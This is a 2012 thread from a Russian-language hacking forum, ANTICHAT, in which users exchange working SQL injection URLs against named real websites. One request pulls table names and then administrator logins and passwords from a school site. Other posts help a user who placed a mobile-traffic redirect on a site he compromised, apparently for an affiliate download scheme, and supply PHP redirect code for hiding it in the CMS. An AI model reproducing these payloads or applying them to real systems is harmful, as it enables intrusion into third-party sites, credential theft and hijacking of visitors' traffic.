ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.02.2012, 22:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
такой вопрос, подобрал колонки
Сообщение от None
http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4 ,version%28%29,6,7--+
но при попытке вывода инфы вылитает ошибка, как быть?
|
|
|
|

09.02.2012, 23:08
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
такой вопрос, подобрал колонки
но при попытке вывода инфы вылитает ошибка, как быть?
http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4 ,unhex(hex(version())),6,7--+
qaz, почитайте мануал от Dr.Z3r0, понадобится
|
|
|

10.02.2012, 08:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от Konqi
Konqi said:
http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4 ,unhex(hex(version())),6,7--+
qaz
, почитайте мануал от
Dr.Z3r0
, понадобится
Также можно использовать binary().
|
|
|
|

10.02.2012, 13:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Вопрос по WAP
Лью траффик в одной партнерке на загрузку Skype, вписывал такой код в .htaccess
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigab ot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|o oyyo|pagebull|scooter|w3c_validator|jigsaw|webalta |yahoofeedseeker|mmcrawler|yandexbot|yandeximages| yandexvideo|yandexmedia|yandexblogs|yandexaddurl|y andexfavicons|yandexdirect|yandexmetrika|yandexcat alog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://site.com/skype/2222/skype.auto [L,R=302]
Трафф шел без проблем, но позавчера админ заметил код и что он мог сделать не пойму, код в .htaccess сохраняется а трафф не идет, как он cмог отрубить мобильный трафф?
PS : Раньше он шеллы искал и удалял, а сейчас даже не ищет
|
|
|
|

10.02.2012, 13:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
er9j6@,
как вариант, сайт был перенесен на другой сервер.
|
|
|
|

10.02.2012, 14:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Ereee
Ereee said:
er9j6@
,
как вариант, сайт был перенесен на другой сервер.
Код на загрузку Skype, можно как-то вписать на php в двиг CMS?
|
|
|
|

10.02.2012, 16:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Moriarty
Moriarty said:
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...
Привожу полностью файл .htacess, js-код я не нашел
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigab ot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|o oyyo|pagebull|scooter|w3c_validator|jigsaw|webalta |yahoofeedseeker|mmcrawler|yandexbot|yandeximages| yandexvideo|yandexmedia|yandexblogs|yandexaddurl|y andexfavicons|yandexdirect|yandexmetrika|yandexcat alog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://site.com/skype/2222/skype.auto [L,R=302]
RewriteEngine on
RewriteCond $1 !^(robots\.txt)
RewriteCond %{HTTP_HOST} ^site.ru|mail.site.ru|pop.site.ru|smtp.site.ru|ftp .site.ru|old.site.ru$
RewriteRule ^(.*)$ http://www.site.ru/$1 [NC,R=301,L]
#RewriteCond %{REQUEST_FILENAME} shop2.*
#RewriteRule . index-yii.php [QSA,L]
RewriteCond %{REQUEST_FILENAME} scheme2.*
RewriteRule . index-yii.php [QSA,L]
#проверка существоания файла:
RewriteCond %{REQUEST_FILENAME} !-f
#проверка существования директории
RewriteCond %{REQUEST_FILENAME} !-d
#если не то не другое не сработало, передается к скрипту
RewriteRule ^(.*)$ art_content.php?$1 [QSA,L]
AddType application/x-httpd-php .css .shtml
#php_flag log_errors On
#php_flag display_errors Off
#php_value error_reporting "E_ALL"
|
|
|
|

10.02.2012, 16:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Moriarty
Moriarty said:
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...
А куда он это код мог вписать, в index.php его нет?
|
|
|
|

10.02.2012, 16:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Код:
Code:
AddType application/x-httpd-php .css .shtml
Подозрительно ^.
PHP/Javascript-редирект сделать легко.
Пример PHP:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$version[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]"desktop"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"])||[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"])))
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: http://TRAFF'[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
Javascript :
|
|
|
|

10.02.2012, 17:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 17560
Репутация:
0
|
|
Сообщение от ivan151
ivan151 said:
не поможите таблицу с данными админа найти,просто на сайте как таковых пользователей нет т.к там нет ничего(ни форума ни каких-то отзывов ну и ничего,для чего собственно и регестрируются люди) но на главной странице есть форма входа при нажатии "вход" с пустыми полями ведёт на /admin/index.php судя по всему админка,ну значит и таблица с данными должна быть вот сайт http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,table_NAME,3,4,5+FROM+INFORMATION _SCHEMA.tables+limit+0,1
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(login,0x3a,password) ,3,4,5+from+lsh_infousers+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|